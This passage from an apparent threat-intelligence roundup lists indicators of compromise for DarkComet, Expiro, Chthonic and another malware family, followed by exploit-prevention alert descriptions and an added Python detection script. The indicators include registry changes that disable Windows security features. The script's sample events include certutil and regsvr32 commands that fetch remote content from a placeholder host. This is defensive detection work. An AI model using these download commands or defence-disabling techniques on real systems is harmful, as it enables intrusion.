Value Name: C:\Windows\SysWOW64\exlrqyet
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\fymsrzfu
4
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\unbhgouj
3
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
43[.]231[.]4[.]7 107
69[.]55[.]5[.]249 107
239[.]255[.]255[.]250 106
217[.]172[.]179[.]54 106
5[.]9[.]72[.]48 106
130[.]0[.]232[.]208 106
144[.]76[.]108[.]82 106
185[.]253[.]217[.]20 106
45[.]90[.]34[.]87 106
185[.]254[.]190[.]218 106
157[.]240[.]18[.]174 102
176[.]9[.]119[.]47 78
157[.]240[.]2[.]174 72
104[.]47[.]54[.]36 57
69[.]31[.]136[.]5 56
12[.]167[.]151[.]116/30 55
104[.]47[.]53[.]36 50
67[.]195[.]204[.]72/30 49
172[.]217[.]165[.]132 38
142[.]250[.]80[.]4 37
37[.]1[.]217[.]172 35
172[.]217[.]197[.]103 35
216[.]239[.]32[.]21 33
172[.]217[.]197[.]99 33
209[.]85[.]233[.]26/31 32
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
249[.]5[.]55[.]69[.]in-addr[.]arpa 107
microsoft-com[.]mail[.]protection[.]outlook[.]com 107
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 106
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 106
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 106
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 106
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 106
msr[.]pool-pay[.]com 74
schema[.]org 66
api[.]sendspace[.]com 56
www[.]amazon[.]com 40
work[.]a-poster[.]info 35
www[.]google[.]co[.]uk 25
market[.]yandex[.]ru 24
117[.]151[.]167[.]12[.]in-addr[.]arpa 23
www[.]sendspace[.]com 19
119[.]151[.]167[.]12[.]in-addr[.]arpa 19
d3ag4hukkh62yn[.]cloudfront[.]net 16
www[.]google[.]de 15
e6225[.]x[.]akamaiedge[.]net 14
sso[.]godaddy[.]com 14
ip[.]pr-cy[.]hacklix[.]com 13
e15316[.]e22[.]akamaiedge[.]net 13
120[.]151[.]167[.]12[.]in-addr[.]arpa 12
116[.]151[.]167[.]12[.]in-addr[.]arpa 10
*See JSON for more IOCs
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 107
%SystemRoot%\SysWOW64\config\systemprofile:.repos 107
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 106
%TEMP%\<random, matching '[a-z]{8}'>.exe 105
%System32%\config\systemprofile:.repos 91
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 80
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 10
%System32%\dsxnnoo\ehnhwhsy.exe (copy) 1
%System32%\ouewjtk\xxyjefdl.exe (copy) 1
%System32%\xpastio\tyidxjgi.exe (copy) 1
%System32%\gmhdxak\qkkbmvmo.exe (copy) 1
%System32%\ktkxhdj\mktudzok.exe (copy) 1
%System32%\sidnzcr\foinfezv.exe (copy) 1
%System32%\pdfgkrg\oxrwonie.exe (copy) 1
%System32%\qimtsxf\dgmgvgrx.exe (copy) 1
%System32%\zbdfcry\rzosfdmm.exe (copy) 1
%System32%\rmywcty\xfuyljss.exe (copy) 1
%System32%\mpyany\idhzpaca.exe (copy) 1

File Hashes

00c674842485d0a34c56abb7a1e673c79875fe35382ea51e1a2ff16edc3c240e 02f60d18bd98377c7af870845b3d9a7bfc2a6e6f2e4fb324b1c1fd6f9f2dbbca 03b7ce534b05d0070f70be70d141c822fed561768904bea1eda77f2d37bd2cfc 03e0dd8a7ea927539e4d2990de10584ac74dbb68949a4b8fb9005823dd3cb51d 04d66ec3bee8c60bbaf4a5aeb47c80901f9a6c9d8354a2ee9095a75362dee565 0523677ff3a1846a4e031ce41d60a4e07d3d3817c3d544a13e8086dc288080fa 09d199274b707bc8d8f35c7e37e8afffcff5e4e087c713a769d23bccd1af7553 0a56c5f9445ccc7f3b9562be7a52ca1400e71ed7e8d67c781bcf0d8c16bd97a1 0c3ddab7c322a82233728f3f2424e23f0ecb37f58630f501c0413326b3af03a9 0c8421f55d2a4917b014f870e8f4bc6d200938e460e7209e4e95c70c2550f90b 14d15c7aaef433855564d0e1a447ecf955bc3e2a52ab20a855e704730cbbd04e 16d7303d3a93b51cdca260056269783b6d3a69e645e66c2c7a79e1ceecf67849 1986abe00926f936566dfb097af7d2a1e412ced3f73926f86afd01b30a80fba3 1f0e3d30b3b9aa38f14a6ba542326c3789a9783d4caeef65e862a0eedce2295e 1f33c7ce24bd950531a23fa49aa68a245d670309d19cb890ea35200101e4edd3 22eb9f988595b1233f885ccef90f74ba7a4e14991e650b82778d76274041bff5 23b381132bbfa22cfa650db8a9f4c7baae32008626bed30c4f9bd718bc8e0033 23c876df2fc90b44b23fc2fd66defad929e95898f0194912fdbae4e642d0d143 274f3d0758f41dcd86d34fd05d771b2de81a326f7c09dcee4fd553b19fe97e73 28e7890934af692e34386be108633c304a17bf084d6992b9e8d697984b258f5d 2f58b323febc290e36a187ac54e24808c2b721c8acb29f7ae234a1dfd1604b28 30ed820da7bb41441e194173fbfbd18d9207634180d025f723f338e3b0789cbd 31d8ea597a357e85181e04bd46a3ff3965bcb38f054226f356e3b3a76c8fbe10 358c63023dd6a4fd51717768eba13a95ea58c78660055055feeeed6ecb08e9db 3685a74575109eca8855aac519d914dab5d7b73e8fa6861c3386f6a1d4396e54
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Dropper.DarkComet-9823729-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 12 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\DC3_FEXEC 11
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: UserInit
11
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
8
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
7
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
7
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN
Value Name: NoControlPanel
7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION 7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\CURRENTVERSION\EXPLORERN 7
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableRegistryTools
5
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svchost.exe
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: MicroUpdate
3
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: DisableTaskMgr
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Svchost
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svhost
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: svhcost
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Loading
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: msdcsc
1
<HKCU>\SOFTWARE\DC3_FEXEC
Value Name: 1/22/2021 at 2:29:46 PM
1
Mutexes Occurrences
DC_MUTEX-<random, matching [A-Z0-9]{7}> 10
DCPERSFWBP 5
DCMUTEX 1
Local\https://docs.microsoft.com/ 1
DCMIN_MUTEX-GTM7XMF 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 1
204[.]79[.]197[.]200 1
172[.]217[.]12[.]174 1
151[.]101[.]2[.]217 1
152[.]199[.]4[.]33 1
65[.]55[.]44[.]109 1
151[.]101[.]128[.]133 1
31[.]202[.]203[.]58 1
151[.]101[.]248[.]133 1
188[.]187[.]1[.]85 1
23[.]6[.]69[.]99 1
140[.]82[.]112[.]3 1
140[.]82[.]114[.]4 1
23[.]5[.]230[.]228 1
52[.]85[.]144[.]32 1
104[.]108[.]100[.]37 1
40[.]91[.]78[.]9 1
35[.]244[.]181[.]201 1
34[.]107[.]221[.]82 1
13[.]107[.]246[.]13 1
34[.]213[.]158[.]239 1
52[.]43[.]72[.]100 1
142[.]250[.]111[.]157 1
23[.]64[.]110[.]64 1
184[.]73[.]47[.]67 1
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
id-user-agent[.]ddns[.]net 2
github[.]com 1
aka[.]ms 1
az725175[.]vo[.]msecnd[.]net 1
cdn[.]speedcurve[.]com 1
schema[.]org 1
stats[.]g[.]doubleclick[.]net 1
w[.]usabilla[.]com 1
www[.]google-analytics[.]com 1
github[.]map[.]fastly[.]net 1
e11290[.]dspg[.]akamaiedge[.]net 1
prod[.]balrog[.]prod[.]cloudops[.]mozgcp[.]net 1
prod[.]detectportal[.]prod[.]cloudops[.]mozgcp[.]net 1
shavar[.]prod[.]mozaws[.]net 1
cs22[.]wpc[.]v0cdn[.]net 1
search[.]r53-2[.]services[.]mozilla[.]com 1
d1zkz3k4cclnv6[.]cloudfront[.]net 1
e13630[.]dscb[.]akamaiedge[.]net 1
detectportal[.]firefox[.]com 1
aus5[.]mozilla[.]org 1
search[.]services[.]mozilla[.]com 1
shavar[.]services[.]mozilla[.]com 1
tracking-protection[.]cdn[.]mozilla[.]net 1
avatars[.]githubusercontent[.]com 1
seik[.]servegame[.]com 1
*See JSON for more IOCs
Files and or directories created Occurrences
%APPDATA%\dclogs 11
%SystemRoot%\SysWOW64\MSDCSC 4
%SystemRoot%\SysWOW64\MSDCSC\svchost.exe 4
%System32%\MSDCSC\svchost.exe 4
%HOMEPATH%\Documents\MSDCSC 2
%HOMEPATH%\Documents\MSDCSC\msdcsc.exe 2
%TEMP%\MSDCSC 2
%TEMP%\MSDCSC\svchost.exe 1
%TEMP%\DCSCMIN\IMDCSC.exe 1
%TEMP%\SYSTEM\svhcost.exe 1
%TEMP%\QCTYFQJCMK.EXE 1
%TEMP%\MSDCSC\Loading.exe 1
\chrome.2232.14.112542066 1
\chrome.2232.15.101924513 1
\chrome.2232.16.47817260 1
\chrome.2232.17.106717536 1
\chrome.2232.18.113880761 1
\chrome.2232.19.178135140 1
\chrome.2232.2.180554381 1
\chrome.2232.20.1307372 1
\chrome.2232.21.101500300 1
\chrome.2232.22.34426735 1
\chrome.2232.23.107152613 1
\chrome.2232.24.137792035 1
\chrome.2232.25.98627946 1
*See JSON for more IOCs

File Hashes

05cc3cc3ab7d46fb7669d1b75722b3dfea971100f512bfc268c2fc473addaf28 12f32717e339420d0fb271d1feeb43337f4b0c0505abeb48cc1f228ae5254c57 1389952c07869c0490046d5c4581bcf223b44f93802fcb8628fcce99273c86f3 27e600df9a2388f9cb6d1a34551926e5ba13baf113fca75eca8014becaf5cf08 86da6d04f5fb01d4e6598f44e49c6a9f263d0832dce01c74525fcfb4ef72c03a a33ad8cb740ded317b2faa2e21ba189c2edc76fe91edbb6e158d76185107f361 a96a869174797a24ba6aa150c2f7b11a5a27c289a4fd055573a030271a57e778 abc86ad35c14bf2e17fbff5f67afb7e107242a0669e1e5793609a4d62d00f474 bb40d99df4be6c486bcbd7a4162793b5b47a20aa33344231819e09ecaef499f4 d71431cf0315014cde7647af45516100002ebaa657e42d1f439ae2a26367952a e43ab694d6795d536b1f73f77edd2850f7b5f6a50730ac0d1439bf2245e5617e fefbb4fce4c5d5daf3ab3ca35c88266e216065f18811202f5b2e16a2cfbb0712

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP



ThreatGrid



MITRE ATT&CK





Win.Virus.Expiro-9826837-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VDS
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VDS
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\VSS
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WBENGINE
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WBENGINE
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMIAPSRV
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMIAPSRV
Value Name: Start
17
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM
Value Name: EnableSmartScreen
17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 17
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: EnableNotifications
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
17
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
17
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
17
Mutexes Occurrences
kkq-vx_mtx62 17
kkq-vx_mtx63 17
kkq-vx_mtx64 17
kkq-vx_mtx65 17
kkq-vx_mtx66 17
kkq-vx_mtx67 17
kkq-vx_mtx68 17
kkq-vx_mtx69 17
kkq-vx_mtx70 17
kkq-vx_mtx71 17
kkq-vx_mtx72 17
kkq-vx_mtx73 17
kkq-vx_mtx74 17
kkq-vx_mtx75 17
kkq-vx_mtx76 17
kkq-vx_mtx77 17
kkq-vx_mtx78 17
kkq-vx_mtx79 17
kkq-vx_mtx80 17
kkq-vx_mtx81 17
kkq-vx_mtx82 17
kkq-vx_mtx83 17
kkq-vx_mtx84 17
kkq-vx_mtx85 17
kkq-vx_mtx86 17
*See JSON for more IOCs
Files and or directories created Occurrences
%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 17
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 17
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 17
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 17
%ProgramFiles%\Windows Media Player\wmpnetwk.exe 17
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 17
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 17
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 17
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 17
%System32%\FXSSVC.exe 17
%System32%\UI0Detect.exe 17
%System32%\VSSVC.exe 17
%System32%\alg.exe 17
%System32%\dllhost.exe 17
%System32%\ieetwcollector.exe 17
%System32%\msdtc.exe 17
%System32%\msiexec.exe 17
%System32%\snmptrap.exe 17
%System32%\sppsvc.exe 17
%System32%\vds.exe 17
%System32%\wbem\WmiApSrv.exe 17
%System32%\wbengine.exe 17
%SystemRoot%\ehome\ehrecvr.exe 17
%SystemRoot%\ehome\ehsched.exe 17
%SystemRoot%\SysWOW64\dllhost.exe 17
*See JSON for more IOCs

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid, MITRE ATT&CK

Win.Packed.Chthonic-9826669-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys Occurrences
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC Value Name: Start 16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND Value Name: Start 16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC Value Name: Start 16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV Value Name: Start 16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED Value Name: Hidden 15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: EnableLUA 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED Value Name: ShowSuperHidden 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER Value Name: HideSCAHealth 15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER Value Name: HideSCAHealth 15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER Value Name: TaskbarNoNotification 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER Value Name: TaskbarNoNotification 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS Value Name: Load 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 1081297374 15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: 1081297374 15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM Value Name: DisableTaskMgr 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS Value Name: Start 1
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE Value Name: DisableConfig 1
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE Value Name: DisableSR 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: BrowserUpdate 1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: BrowserMe 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WERSVC Value Name: Start 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND Value Name: ErrorControl 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS Value Name: ErrorControl 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC Value Name: ErrorControl 1
Mutexes Occurrences
_AVIH784909NJJNJ90707_ 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
europe[.]pool[.]ntp[.]org 15
pono11[.]eu 15
pro7778[.]com 15
www[.]telize[.]com 1
Files and or directories created Occurrences
%ProgramData%\msodtyzm.exe 15
%ProgramData%\~ 15
%TEMP%\update.exe 1
%APPDATA%\BrowserMe 1
%APPDATA%\BrowserMe\GoogleUpdate.exe 1
%APPDATA%\BrowserMe\RCX90C1.tmp 1
%APPDATA%\BrowserMe\RCX91FA.tmp 1
%APPDATA%\BrowserMe\RCX9353.tmp 1
%APPDATA%\BrowserMe\RCX105C.tmp 1
%APPDATA%\BrowserMe\RCX10DA.tmp 1
%APPDATA%\BrowserMe\RCX1196.tmp 1
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 1

File Hashes


Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid, MITRE ATT&CK

Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (7836)
Process hollowing is a technique used by some programs to evade static analysis. In typical usage, a process starts and unpacks its obfuscated or encrypted contents into memory. The parent then manually performs the first stages of launching a child process, but before the child runs, the child's memory is cleared and filled in with the unpacked contents from the parent instead.
Crystalbit-Apple DLL double hijack detected - (5361)
A Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
A Microsoft Office process has started a windows utility. - (1379)
A process associated with Microsoft Office, such as EXCEL.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
Excessively long PowerShell command detected - (860)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
Squiblydoo application whitelist bypass attempt detected. - (671)
An attempt to bypass application whitelisting via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
Kovter injection detected - (517)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Dealply adware detected - (373)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Certutil.exe is downloading a file - (252)
The certutil.exe utility has been detected downloading and executing a file. Upon execution, the downloaded file behaved suspiciously. The normal usage of certutil.exe involves retrieving certificate information. Attackers can use this utility to download additional malicious payloads.
Reverse http payload detected - (113)
An exploit payload intended to connect back to an attacker-controlled host using HTTP has been detected.
Gamarue malware detected - (106)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
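Several of the alerts above are simple behavioral rules over process-creation telemetry. The following is an added example, not Cisco AMP's own logic, that models four of them (Office spawning a Windows utility, excessively long PowerShell command lines, certutil.exe and regsvr32.exe given a URL) and runs them over constructed sample events; the name lists, the 1000-character threshold and the event fields are assumptions.

```python
import re

# Heuristics modelled on four of the AMP exploit-prevention alerts above;
# thresholds and name lists are assumptions, not Cisco's configuration.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WINDOWS_UTILITIES = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LONG_POWERSHELL_CHARS = 1000          # assumed "excessively long" threshold
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def classify(event):
    """Return the list of alert names a single process-creation event triggers."""
    parent = event["parent"].lower()
    image = event["image"].lower()
    cmdline = event["cmdline"]
    alerts = []
    # Office process spawning a shell or scripting utility
    if parent in OFFICE_PARENTS and image in WINDOWS_UTILITIES:
        alerts.append("office_started_windows_utility")
    # Very long PowerShell command line, a common sign of an obfuscated script
    if image == "powershell.exe" and len(cmdline) > LONG_POWERSHELL_CHARS:
        alerts.append("excessively_long_powershell")
    # certutil.exe handed a URL: certificate tooling used as a downloader
    if image == "certutil.exe" and URL_RE.search(cmdline):
        alerts.append("certutil_download")
    # regsvr32.exe handed a URL: remote script content (Squiblydoo pattern)
    if image == "regsvr32.exe" and URL_RE.search(cmdline):
        alerts.append("squiblydoo_whitelist_bypass")
    return alerts


def scan(events):
    """Run classify() over a batch and return (pid, alert) pairs in event order."""
    return [(e["pid"], a) for e in events for a in classify(e)]


# Constructed sample telemetry (not real events); example.invalid is a reserved name.
SAMPLE_EVENTS = [
    {"pid": 100, "parent": "explorer.exe", "image": "WINWORD.EXE",
     "cmdline": "WINWORD.EXE invoice.docm"},
    {"pid": 101, "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -e " + "A" * 1200},
    {"pid": 102, "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe http://example.invalid/x.bin x.bin"},
    {"pid": 103, "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -dump cert.cer"},
    {"pid": 104, "parent": "cmd.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /i:http://example.invalid/a.sct"},
]

if __name__ == "__main__":
    for pid, alert in scan(SAMPLE_EVENTS):
        print(pid, alert)
```

Event 103 shows the benign case the certutil rule must not fire on: certificate inspection with no URL in the command line.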
